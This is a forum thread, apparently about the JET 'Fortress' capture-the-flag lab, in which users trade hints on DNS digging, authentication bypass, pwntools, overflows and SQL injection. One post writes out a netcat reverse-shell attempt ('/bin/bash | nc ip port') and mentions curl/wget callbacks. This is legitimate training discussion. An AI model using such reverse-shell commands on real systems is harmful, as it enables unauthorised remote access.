[JET] Fortress

i am stuck at digging inā€¦ can you help me in this with nudges

Type your comment> @r061nh00d said:

i am stuck at digging inā€¦ can you help me in this with nudges

Mate, look at the open ports and ā€œdigā€ on one of them :wink:
You should get something new, then it should be easy to find the flag

@daemonzone thank bro i got that flag

going deeper clue

Thanks to @sh4d0wless for PM me :slight_smile:

anyone can help me for overflown question?
i cant get success with my exploit on local :confused: (note: im beginner on pwn and re)
i can send my exploit on discord, sh4d0wless#6154

I stuck with bypass authentication, I tried many attempts to bypass but couldnā€™t get through.

Could you anyone ping me please.

I stuck with memo.
ā€”Honestly with pwntools in this case.
I tried use pwntools, tried wroite simple script for creating note but after ā€œAre you done? [yes/no]ā€ I give ā€œWhich part of [yes/no] did you not understand?%ā€ and canā€™t respond anything.
Cat somebody give hint how use pwntools in cases like this?ā€”

UPD. Itā€™s strange but after reinstall it started to workā€¦ but anyway strange

F**k, the box is flounderingā€¦ admin page not available for flag #6ā€¦ ? ā€œ504 Gateway Time-outā€

Again:

???

504 Gateway Time-out
nginx/1.10.3 (Ubuntu)

Someone can help me to catch the 6th flag?.. Iā€™m searching a good documentation to repair the ā€œleakā€ :wink: Reversing an ELF is not my force at allā€¦ Thanks!

Type your comment> @choupit0 said:

F**k, the box is flounderingā€¦ admin page not available for flag #6ā€¦ ? ā€œ504 Gateway Time-outā€

Again:

???

504 Gateway Time-out
nginx/1.10.3 (Ubuntu)

Hi, youā€™d better script the login and reverse shell process to make it work anytime :wink:

Type your comment> @daemonzone said:

Type your comment> @choupit0 said:

F**k, the box is flounderingā€¦ admin page not available for flag #6ā€¦ ? ā€œ504 Gateway Time-outā€

Again:

???

504 Gateway Time-out
nginx/1.10.3 (Ubuntu)

Hi, youā€™d better script the login and reverse shell process to make it work anytime :wink:

Yes, this is what I am doing :wink: but sometimes I get this error.

And do you have a good article about 6th flag?..

And do you have a good article about 6th flag?..

Maybe A journey into Radare 2 ā€“ Part 2: Exploitation ā€“ Megabeets

Type your comment> @fr0ster said:

(Quote)
Maybe A journey into Radare 2 ā€“ Part 2: Exploitation ā€“ Megabeets

Thank you @fr0ster very interesting and detailed.

Hello guys!
Iā€™m able to make command execution, also I can to make simple TCP connect using ā€œnc ip portā€, but I canā€™t to get a reverse shell. I have tried every payload from pentest monkeys. Also I have tried to make curl or wget to my machine, but connection didnā€™t come to my machine and I see 302 code.
Could someone help me with this issue?
The only payload with some progress is ā€œ/bin/bash | nc ip portā€, but shell dropping immidiately after connection

hi guy been stuck at Secret Message part now for few days need little hint please
thanks

Iā€™m stuck with digging, each time I try to dig i get connection timed out, is this normal ?
and can someone help me getting over this? :\

Iā€™m stuck on Elasticityā€¦I try a lot of think but nothing dedicated port seems to be not so ā€œresponsiveā€ā€¦can anyone give me a suggestion ?

Can someone pm for a quick question about overflow?

Sq**ap is not finding any injection vulns in mysql. Probably something wrong with my config.